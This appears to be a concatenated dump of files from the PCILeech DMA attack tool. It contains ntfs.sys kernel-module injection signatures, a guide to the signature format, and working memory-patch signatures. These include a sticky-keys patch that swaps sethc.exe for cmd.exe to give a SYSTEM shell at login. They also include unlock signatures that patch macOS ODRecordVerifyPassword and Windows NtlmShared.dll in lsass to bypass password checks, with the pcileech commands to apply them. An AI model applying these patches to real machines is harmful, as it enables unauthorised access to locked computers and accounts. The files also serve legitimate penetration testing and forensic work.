# .szHash2 = "a65cf907fb5aecb5d2a256b8a49706469025c740a896e3a8d0b27537f6fbbc6f",
# .szSignatureData = ",d3920,DEFAULT_WINX64_STAGE1,4ad80,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804a000100210001800a0003800c00018054010100080000001b00018001000000"
# },
#
#
ntfs.sys signed on 2014-10-15 (Windows 8.1 x64);win8x64_ntfs_20141015.kmd;# ntfs.sys signed on 2014-10-15 (MJ_CREATE);0xd3000;0x4a000;1ac5c0df47e153480fc49bb3687df84473168bd65b4bb58ab3885f47a6116d1b;a65cf907fb5aecb5d2a256b8a49706469025c740a896e3a8d0b27537f6fbbc6f;,d3920,DEFAULT_WINX64_STAGE1,4ad80,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804a000100210001800a0003800c00018054010100080000001b00018001000000
ntfs.sys signed on 2015-12-30 (Windows 8.1 x64);win8x64_ntfs_20151230.kmd;# ntfs.sys signed on 2016-12-30 (MJ_CREATE);0xd1000;0x49000;65b0b0cf8a508d20cb6906fe4fea9e10a1c4398c4f5c4bbbc366383e06572695;6387547a0a12d5814681f0ed5fc47cd6aa31e8b4428bee8cf18081bb8ab57d67;,d1190,DEFAULT_WINX64_STAGE1,49d80,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038049000100200001800a0003800c00018054010100080000001b00018001000000
ntfs.sys signed on 2017-09-09 (Windows 8.1 x64);win8x64_ntfs_20170909.kmd;# ntfs.sys signed on 2017-09-09 (MJ_CREATE);0xd0000;0x49000;a8857d9011802d52075b70854b2f7b83fc05b66e12bf212fbaee97779958afd8;3121c422abd92bba47dba5f660bc72e94b3ee5703857763b1b6498730499bc52;,d0c80,DEFAULT_WINX64_STAGE1,49d80,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038049000100210001800a0003800c00018052010100080000001b00018001000000
ntfs.sys signed on 2016-02-23 (Windows 10 x64);win10x64_ntfs_20160223.kmd;# ntfs.sys signed on 2016-02-23 (MJ_CREATE);0xca000;0x4f000;0592b0387ec943697dd0f552564e087c8dd385b25db565ffb11fa6bd1cf10b14;218325e192e8146883054359e984376be0d13486c05d31ab4a23ff834ebb623e;,ca770,DEFAULT_WINX64_STAGE1,4fe38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804f00010023000180080003801400018066010100050000001d00018001000000
ntfs.sys signed on 2015-12-01 (Windows 10 x64);win10x64_ntfs_20151201.kmd;# ntfs.sys signed on 2015-12-01 (MJ_CREATE);0xc5000;0x4d000;3bac25cd0e0cfc45dcb7efa67200e4800ffe8278fd3249a382bd4403f3309756;fcc23d38f37141010e2985cc2c7babc8796c36e85b820d77d5c6b4fe66c6caf0;,c51e0,DEFAULT_WINX64_STAGE1,4dd30,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018061010100050000001d00018001000000
ntfs.sys signed on 2015-07-30 (Windows 10 x64);win10x64_ntfs_20150730.kmd;# ntfs.sys signed on 2015-07-30 (MJ_CREATE);0xc4000;0x4d000;cd135fc58b88f96abff0ddb1207cb9e84e5b2f040607d0500de0018d32ad1572;2cfd3b597b341c056a30a186b1347d82d211cf1319464ad1f13cfa525891e409;,c4dc0,DEFAULT_WINX64_STAGE1,4dd20,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018061010100050000001d00018001000000
ntfs.sys signed on 2015-07-17 (Windows 10 x64);win10x64_ntfs_20150717.kmd;# ntfs.sys signed on 2015-07-17 (MJ_CREATE);0x1f000;0x4d000;9ac57fa7e7d8d92e066c6ce9c76c82fc3afccc1e6211eb4d9b03ea79c8a70b3b;2cfd3b597b341c056a30a186b1347d82d211cf1319464ad1f13cfa525891e409;,1fb90,DEFAULT_WINX64_STAGE1,4dd20,DEFAULT_WINX64_STAGE2.bin,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018061010100050000001d00018001000000
ntfs.sys signed on 2015-07-10 (Windows 10 x64);win10x64_ntfs_20150710.kmd;# ntfs.sys signed on 2015-07-10 (MJ_CREATE);0xc4000;0x4d000;a8a4e0d7963c2652226064c674b7ed38b1f84a8661e8f63663783dafb83271fc;95964341fb3121baf303037a3796bd98c4167261ead9a4b4587a31e8a546dda1;,c4ec0,DEFAULT_WINX64_STAGE1,4dd20,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018062010100050000001d000180
ntfs.sys signed on 2016-03-29 (Windows 10 x64);win10x64_ntfs_20160329.kmd;# ntfs.sys signed on 2016-03-29 (MJ_CREATE);0xca000;0x4f000;d091d4d5452ef388c6ff22780922f3f944a8439e5109dae207151f7f4fd23991;84b0ffd20272e8757023975ef52132c9e82df7e81da537cf436407733a1f4957;,ca770,DEFAULT_WINX64_STAGE1,4fe38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804f00010023000180080003801400018066010100050000001d000180
ntfs.sys signed on 2016-08-03 (Windows 10 x64) [10.0.10240.17071];win10x64_ntfs_20160803_10240.kmd;# ntfs.sys signed on 2016-08-03 (MJ_CREATE) [10.0.10240.17071];0xc5000;0x4d000;c80d2ff8c58669a539ecc636103a73eb8c65a4568c81d6627a9b14f428d0207f;bafe68ca0561d5137504c53360cdec01b8d522eade7e558b90231fdaf53a66a5;,c51e0,DEFAULT_WINX64_STAGE1,4de38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018061010100050000001d00018001000000
ntfs.sys signed on 2017-09-19 (Windows 10 x64) [10.0.10240.17643];win10x64_ntfs_20170919_10240.kmd;# ntfs.sys signed on 2017-09-19 (MJ_CREATE) [10.0.10240.17643];0xdd000;0x1ec000;3f688bfd33764abc387ed1ffe57ee287cb4726ef58fb88f104a350d62f25b240;950b63465d1982cc41108376717f8dda508c3778b6358ce21e4272c7e75a1306;,dd7b0,DEFAULT_WINX64_STAGE1,1ece38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003804d00010022000180080003801400018061010100050000001d00018001000000
ntfs.sys signed on 2016-07-16 (Windows 10 x64) [10.0.14393.0];win10x64_ntfs_20160716_14393.kmd;# ntfs.sys signed on 2016-07-16 (MJ_CREATE) [10.0.14393.0];0xf6000;0x53000;5cadebe69115cc66e07f7d1e3f97ad0522840c1c648d33b37d8fe9f9a36ae413;04d501dae7a097b649edc0bb68dc02036e31ece8c30ee48ab24ac8fb3095fe46;,f6b70,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2016-08-20 (Windows 10 x64) [10.0.14393.103];win10x64_ntfs_20160820_14393.kmd;# ntfs.sys signed on 2016-08-20 (MJ_CREATE) [10.0.14393.103];0xf6000;0x53000;c6b3a2c6a9d19798b9974704e551a4798d0f2098279a67924eebcb03cee07590;04d501dae7a097b649edc0bb68dc02036e31ece8c30ee48ab24ac8fb3095fe46;,f6b70,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2016-09-07 (Windows 10 x64) [10.0.14393.187];win10x64_ntfs_20160907_14393.kmd;# ntfs.sys signed on 2016-09-07 (MJ_CREATE) [10.0.14393.187];0xf7000;0x53000;e6f94244f8ab0cb45a2509679a15ebbb933c936c23d0c600116124b4aebf67d5;04d501dae7a097b649edc0bb68dc02036e31ece8c30ee48ab24ac8fb3095fe46;,f78e0,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2016-11-02 (Windows 10 x64) [10.0.14393.447];win10x64_ntfs_20161102_14393.kmd;# ntfs.sys signed on 2016-11-02 (MJ_CREATE) [10.0.14393.447];0xf7000;0x53000;e044cff9460a778a04e75081dbfa7441bd1b142a9798a2c978c28612f33682c3;04d501dae7a097b649edc0bb68dc02036e31ece8c30ee48ab24ac8fb3095fe46;,f78e0,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2017-03-04 (Windows 10 x64) [10.0.14393.953];win10x64_ntfs_20170304_14393.kmd;# ntfs.sys signed on 2017-03-04 (MJ_CREATE) [10.0.14393.953];0xf7000;0x53000;228a30faacc59dd6b41fab0a5eab73e30ee774fde51e4ee30a8501f81cfe8e54;6c4742133e9409255abb3c3d21eca24e7f303b4968e703acfe4f3e3f4e39ce36;,f78f0,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2017-04-28 (Windows 10 x64) [10.0.14393.1198];win10x64_ntfs_20170428_14393.kmd;# ntfs.sys signed on 2017-04-28 (MJ_CREATE) [10.0.14393.1198];0xf7000;0x53000;1546b88e89466c8602690714ca39ddfde499a3f33a5869747530cb060daf8923;0a9519910b85e243dde74efa9e9f205e182ef166048bd0fe29ff0618df10ba3d;,f78f0,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2017-09-18 (Windows 10 x64) [10.0.14393.1770];win10x64_ntfs_20170918_14393.kmd;# ntfs.sys signed on 2017-09-18 (MJ_CREATE) [10.0.14393.1770];0xf7000;0x53000;d1cf002a0c0db5927ae3e0bacdb1f52fb283416e23e1d42387bae39a3f384cb3;2138340b1aabd7f419293f82683c6dde30937214f29b3d83791c13be00da50db;,f7a10,DEFAULT_WINX64_STAGE1,53e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,0100038053000100240001800800038014000180760101000500000022000180
ntfs.sys signed on 2017-03-18 (Windows 10 x64) [10.0.15063.0];win10x64_ntfs_20170318_15063.kmd;# ntfs.sys signed on 2017-03-18 (MJ_CREATE) [10.0.15063.0];0xcb000;0x55000;f190019c227cbbbd19e9ed6fb840e9838afab598b9ac23a3008d60fb3b139845;b48ce1f64615ae1e734d36f94c0c41cce4e5f6caab58df0121ca6f27e8569599;,cb2e0,DEFAULT_WINX64_STAGE1,55e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,01000380550001002800018008000380150001807f0101000500000023000180
ntfs.sys signed on 2017-09-30 (Windows 10 x64) [10.0.15063.674];win10x64_ntfs_20170930_15063.kmd;# ntfs.sys signed on 2017-09-30 (MJ_CREATE) [10.0.15063.674];0xcb000;0x219000;c1627584ba74d093e74760e12d5c74e0549d5d768f4ec462d55eedfe8dd74d98;871a6f00aea79f7bfd79d23cd3d72d9ae0f7cf7b344ac5f5e9511a641c202348;,cb390,DEFAULT_WINX64_STAGE1,219e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,01000380550001002800018008000380150001807f0101000500000023000180
ntfs.sys signed on 2017-11-02 (Windows 10 x64) [10.0.15063.726];win10x64_ntfs_20171102_15063.kmd;# ntfs.sys signed on 2017-11-02 (MJ_CREATE) [10.0.15063.726];0xcb000;0x219000;b67b714d8ba13a16ef64df94347b2ce373b2447c59a7a723579d1391b1c8c160;1de51f66634410d684aa5764646472e7bd51c3e380308d7418400665168d2c09;,cb3a0,DEFAULT_WINX64_STAGE1,219e38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,01000380550001002800018008000380150001807f0101000500000023000180
ntfs.sys signed on 2017-10-10 (Windows 10 x64) [10.0.16299.19];win10x64_ntfs_20171010_16299.kmd;# ntfs.sys signed on 2017-10-10 (MJ_CREATE) [10.0.16299.19];0xf6000;0x22c000;55b6529027827c433303454a3bfd0fc540bfcb7163089bb4650fb578999db299;8bdfd5302c2521f1a723ef61bdc2543f52bd9a6748d6bb2788ab4ff8ed87dd6f;,f6120,DEFAULT_WINX64_STAGE1,22ce38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,010003805a0001002900018008000380150001808c0101000500000023000180
ntfs.sys signed on 2018-02-10 (Windows 10 x64) [10.0.16299.248];win10x64_ntfs_20180210_16299.kmd;# ntfs.sys signed on 2018-02-10 (MJ_CREATE) [10.0.16299.248];0xd5000;0x22a000;f7d9b1cb758ad97d9070fdfefcc09fe53ba6d42a5fe2d9074a3aa97f7ef95ddf;61c552bc451be0d577fc9828ab6ebed62dc117f17265a5f8c42013f1d843285e;,d5640,DEFAULT_WINX64_STAGE1,22ae38,DEFAULT_WINX64_STAGE2,0,DEFAULT_WINX64_STAGE3,0,01000380590001002900018008000380150001808b0101000500000023000180
================================================
FILE: files/signature_info.txt
================================================
Signature Guide for Search/Patch signatures and Kernel Module signatures
========================================================================
GENERAL
=======
Signature files are read line by line. Signature files may contain multiple
signature lines. The exception is kernel module inserts by page table hijack -
which may only contain one line. Each line contains either a comment, starts
with '#', or a signature line. Signature lines are comma separated and divided
into 'chunks'. Each chunk contains an 'offset' and a 'data' section. The offset
is a hexadecimal dword. The data section is binary data which can be either of:
- = no data.
DEFAULT_ = data loaded from builtin pre-defined shellcodes.
ASCIIHEX = data as asciihex.
FILENAME = file name to load binary data from.
EXAMPLE:
B60,FF15C207,0,-,1aab00,file.bin
The example contains three chunks.
chunk[0] = offset B60 and data FF15C207.
chunk[1] = offset 0 and no data.
chunk[2] = offset 1aab00 and data loaded from file.
MEMORY PATCH SIGNATURE FORMAT
=============================
A memory patch signature file have the extension '.sig'. A file may contain
multiple memory patch signatures. A memory patch signature consists exactly
three (3) chunks. Memory patch signatures support wildcard and relative offsets
in addition to the standard in-page offset.
chunk[0] = search pattern 'data' at 'offset' distance from page base.
chunk[1] = search pattern 'data' at 'offset' distance from page base.
only searched in same page as chunk[0] if match is made in chunk[0].
optional. if not used specify data: '-'
chunk[2] = replace contents with 'data' at distance 'offset' from page base.
MEMORY PATCH SIGNATURES - WILDCARD AND RELATIVE OFFSETS
=======================================================
- Memory patch signatures support in-page fixed offsets in all signature chunks
Examples: 0 ; e0 ; ee0.
- Wildcard offsets are supported in signature chunk 0 and 1, but not in chunk 2
which is chunk containing patch data. A wildcard offset is denoted by '*'.
Example: *
- Relative offsets are supported only in signature chunk 1 and 2. The relative
offset is not supported in signature chunk 0. Relative offsets are calculated
from the offset in chunk 0. Relative offsets can be combined with a wildcard
offset in chunk 0. A relative offset is given by r and then the offset as a
32-bit DWORD in hex.
Examples: r0 ; r1F0 ; rFFFFFFF0 (negative offset of 0x10)
KERNEL MODULE SIGNATURE FORMAT #1 - memory search
=================================================
The default format for kernel signatures is the memory search format. This is
used by PCILeech to search the memory for a signature, which is then patched.
Note that only fixed in-page offsets are supported in kernel module signatures.
chunk[0] = search pattern 'data' at 'offset' distance from page base.
This page contains the function to be overwritten by stage #1 code.
chunk[1] = search pattern 'data' at 'offset' distance from page base.
Stage #2 code will be placed in this page.
chunk[2] = offset to where to place stage #1 code, and stage #1 code.
chunk[3] = offset to where to place stage #2 code, and stage #2 code.
chunk[4] = <offset not in use>, and stage #3 code.
KERNEL MODULE SIGNATURE FORMAT #2 - page table hijack
=====================================================
The page table hijack format is used when a page table needs to be hijacked in
order to gain execution (if the targeted executable memory is above 4GB). Note
that only fixed in-page offsets are supported in kernel module signatures.
chunk[0] = <offset not in use>, 4096-bytes of original page bytes for page in
which stage #1 code should be placed.
chunk[1] = <offset not in use>, 4096-bytes of original page bytes for page in
which stage #2 code should be placed.
chunk[2] = offset to where to place stage #1 code, and stage #1 code.
chunk[3] = offset to where to place stage #2 code, and stage #2 code.
chunk[4] = <offset not in use>, and stage #3 code.
chunk[5] = <offset not in use>, "driver signature"
================================================
FILE: files/stickykeys_cmd_win.sig
================================================
# replace sethc.exe with cmd.exe in memory on Windows
# Signatur for PCILeech version 1.1
# syntax: see signature_info.txt for more information.
#
# Signature by Ian Vitek (Sigtrap)
#
# Signature only found after activating sticky keys at least once.
# (Not 100% reliable to find the signature in memory, but fiddeling around
# with sticky keys will in the end leave the sethc.exe in memory.)
# So, press SHIFT five times to start sethc.exe then patch with this signature.
# Close the Sticky Key dialog and press SHIFT five times
# to get cmd.exe with system access at login.
#
# Windows x64 all versions [20160906]
*,00730065007400680063002E00650078006500200025006C006400000000000000730065007400680063002E006500780065,0,-,r0,0063006D0064002E0065007800650020002000200025006C00640000000000000063006D0064002E00650078006500200020
================================================
FILE: files/unlock_macos.sig
================================================
# unlock signatures for macOS
# syntax: see signature_info.txt for more information.
#
#
# CFOpenDirectory!ODRecordVerifyPassword (various versions)
*,080000004C89F7E83EC40000EB0231DB88D84883C4685B415C415D415E415F5D,0,-,r10,b001
*,080000004C89F7E81AC40000EB0231DB88D84883C4685B415C415D415E415F5D,0,-,r10,b001
================================================
FILE: files/unlock_win10x64.sig
================================================
# Unlock Signatures for Local and AD Accounts for Windows 10 x64 version
#
# Method 1: (faster):
# 1.1 check pid of lsass.exe: pcileech pslist
# 1.2 patch: pcileech patch -sig wx64_unlock_win10.sig -all -pid <pid_of_lsass>
#
# Method 2:
# 2.1 patch: pcileech patch -sig wx64_unlock_win10.sig -all
#
# Syntax: see signature_info.txt for more information.
# Generated on 2024-12-09 18:16:15
#
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.16384 / 2015-07-10]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.18366 / 2019-09-30]
5DC,488BCBFF154B1C0000,5E8,0F8518FBFFFF,5E8,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19387 / 2022-08-04]
65C,488BCBFF15CB1B0000,668,0F8518FBFFFF,668,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10240.19869 / 2023-03-30]
66C,488BCBFF15BB1B0000,678,0F8518FBFFFF,678,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.10586.0 / 2015-10-30]
62C,488BCBFF15B31B0000,638,0F8518FBFFFF,638,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.0 / 2016-07-16]
6DC,488BCBFF15D31B0000,6E8,0F8518FBFFFF,6E8,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.2791 / 2019-02-06]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.3269 / 2019-09-29]
6EC,488BCBFF15C31B0000,6F8,0F8518FBFFFF,6F8,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5291 / 2022-08-07]
76C,488BCBFF15431B0000,778,0F8518FBFFFF,778,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5850 / 2023-03-30]
77C,488BCBFF15331B0000,788,0F8518FBFFFF,788,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.1631 / 2019-02-06]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.2106 / 2019-09-30]
622,488BCBFF15B51C0000,62E,0F852EFBFFFF,62E,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.15254.245 / 2018-01-30]
612,488BCBFF15C51C0000,61E,0F852EFBFFFF,61E,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1268 / 2019-07-05]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1448 / 2019-10-02]
622,488BCBFF15C51C0000,62E,0F852EFBFFFF,62E,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.192 / 2018-01-01]
612,488BCBFF15D51C0000,61E,0F852EFBFFFF,61E,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.1067 / 2019-10-02]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.590 / 2019-02-06]
6A2,488BCBFF15451C0000,6AE,0F852EFBFFFF,6AE,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.523 / 2019-01-01]
692,488BCBFF15551C0000,69E,0F852EFBFFFF,69E,909090909090
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.10935 / 2022-08-05]
7CD,488BCBFF15221B0000,7D9,0F840BFBFFFF,7D9,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.194 / 2018-12-04]
73D,488BCBFF15B21B0000,749,0F840BFBFFFF,749,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.316 / 2019-02-06]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.802 / 2019-10-02]
74D,488BCBFF15A21B0000,759,0F840BFBFFFF,759,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.5122 / 2023-11-08]
7DD,488BCBFF15121B0000,7E9,0F840BFBFFFF,7E9,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.1 / 2019-03-18]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.10022 / 2019-09-15]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.418 / 2019-10-06]
72F,488BCBFF15C01B0000,73B,0F8409FBFFFF,73B,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.1 / 2019-12-07]
423,488BCB48FF1553200000,435,0F84BAFAFFFF,435,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2728 / 2023-03-09]
4B3,488BCB48FF15C31F0000,4C5,0F84BAFAFFFF,4C5,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2965 / 2023-04-27]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3636 / 2023-10-20]
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3684 / 2023-10-17]
4C3,488BCB48FF15B31F0000,4D5,0F84BAFAFFFF,4D5,0F85
#
# Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.4474 / 2024-05-18]
583,488BCB48FF15F31E0000,595,0F84BAFAFFFF,595,0F85
================================================
FILE: files/unlock_win10x86.sig
================================================
# Unlock Signatures for Local and AD Accounts for Windows 10 x86 version
#
# Method 1: (faster):
# 1.1 check pid of lsass.exe: pcileech pslist
# 1.2 patch: pcileech patch -sig wx86_unlock_win10.sig -all -pid <pid_of_lsass>
#
# Method 2:
# 2.1 patch: pcileech patch -sig wx86_unlock_win10.sig -all
#
# Syntax: see signature_info.txt for more information.
# Generated on 2024-12-09 18:16:15
#
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.10240.16384 / 2015-07-10]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.10240.18366 / 2019-09-30]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.10240.19387 / 2022-08-04]
507,56FF151C610010,510,0F8598FBFFFF,510,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.10240.19869 / 2023-03-30]
517,56FF151C610010,520,0F8598FBFFFF,520,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.10586.0 / 2015-10-30]
627,56FF15F0600010,630,0F8598FBFFFF,630,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.14393.2791 / 2019-02-06]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.14393.3269 / 2019-09-29]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.14393.5291 / 2022-08-07]
7A7,56FF15F8700010,7B0,0F8598FBFFFF,7B0,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.14393.5850 / 2023-03-30]
7B7,56FF15F8700010,7C0,0F8598FBFFFF,7C0,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.15063.1631 / 2019-02-06]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.15063.2106 / 2019-09-29]
79E,56FF15F8600010,7A7,0F8584FBFFFF,7A7,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.15254.158 / 2018-01-03]
78E,56FF15F8600010,797,0F8584FBFFFF,797,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.16299.1448 / 2019-10-02]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.16299.967 / 2019-02-06]
7AE,56FF15F0600010,7B7,0F8584FBFFFF,7B7,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.16299.192 / 2018-01-01]
79E,56FF15F0600010,7A7,0F8584FBFFFF,7A7,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17134.1067 / 2019-10-02]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17134.590 / 2019-02-06]
83E,57FF15F4700010,847,0F8573FBFFFF,847,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17134.407 / 2018-11-01]
81E,57FF15F4700010,827,0F8573FBFFFF,827,909090909090
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17763.107 / 2018-10-27]
7F9,57FF15F4600010,802,0F8463FBFFFF,802,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17763.10935 / 2022-08-05]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17763.316 / 2019-02-06]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17763.802 / 2019-10-02]
819,57FF15F4600010,822,0F8463FBFFFF,822,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.17763.4964 / 2023-09-14]
829,57FF15F4700010,832,0F8463FBFFFF,832,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.18362.418 / 2019-10-06]
80B,57FF15F4600010,814,0F8461FBFFFF,814,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.19040.1 / 2019-12-06]
CA8,57FF1598B10010,CB1,0F8463FBFFFF,CB1,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.19041.2673 / 2023-02-16]
C28,57FF1598B10010,C31,0F8463FBFFFF,C31,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.19041.2965 / 2023-04-27]
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.19041.3505 / 2023-08-19]
C38,57FF1598B10010,C41,0F8463FBFFFF,C41,0F85
#
# Signature for Windows 10 x86 [NtlmShared.dll 10.0.19041.4474 / 2024-05-18]
CB8,57FF1598B10010,CC1,0F8463FBFFFF,CC1,0F85
================================================
FILE: files/unlock_win11x64.sig
================================================
# Unlock Signatures for Local and AD Accounts for Windows 11 x64 version
#
# Method 1: (faster):
# 1.1 check pid of lsass.exe: pcileech pslist
# 1.2 patch: pcileech patch -sig wx64_unlock_win11.sig -all -pid <pid_of_lsass>
#
# Method 2:
# 2.1 patch: pcileech patch -sig wx64_unlock_win11.sig -all
#
# Syntax: see signature_info.txt for more information.
# Generated on 2025-04-18 19:09:03
#
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.1668 / 2023-03-30]
A7B,488BCB48FF15A3280000,A8D,0F84B2FAFFFF,A8D,0F85
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.887 / 2022-08-04]
A6B,488BCB48FF15B3280000,A7D,0F84B2FAFFFF,A7D,0F85
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.1696 / 2023-03-09]
00B,488BCB48FF15E3220000,01D,0F84B2FAFFFF,01D,0F85
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.2600 / 2023-11-08]
01B,488BCB48FF15D3220000,02D,0F84B2FAFFFF,02D,0F85
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.778 / 2022-06-18]
F8B,488BCB48FF1563230000,F9D,0F84B2FAFFFF,F9D,0F85
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2067 / 2023-07-11]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2506 / 2023-10-19]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2567 / 2023-10-14]
FC9,488D4B1048FF152C230000,FDC,0F85C4FAFFFF,FDC,909090909090
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1 / 2024-04-01]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1150 / 2024-07-03]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1591 / 2024-08-21]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.1882 / 2024-09-28]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.2454 / 2024-11-16]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.712 / 2024-05-16]
B31,4D2BF575EF84D2740A32C0EB09,B3A,32C0,B3A,B001
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.2894 / 2025-01-12]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.3037 / 2025-01-24]
6A1,4D2BFE75EF84D20F8442F8FFFF32C0E93EF8FFFF,6AE,32C0,6AE,B001
#
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.3323 / 2025-02-21]
# Signature for Windows 11 x64 [NtlmShared.dll 10.0.26100.3624 / 2025-03-22]
6C1,4D2BFE75EF84D20F8442F8FFFF32C0E93EF8FFFF,6CE,32C0,6CE,B001
================================================
FILE: files/unlock_win8x64.sig
================================================
# unlock signatures for Windows 8.1
# syntax: see signature_info.txt for more information.
#
#
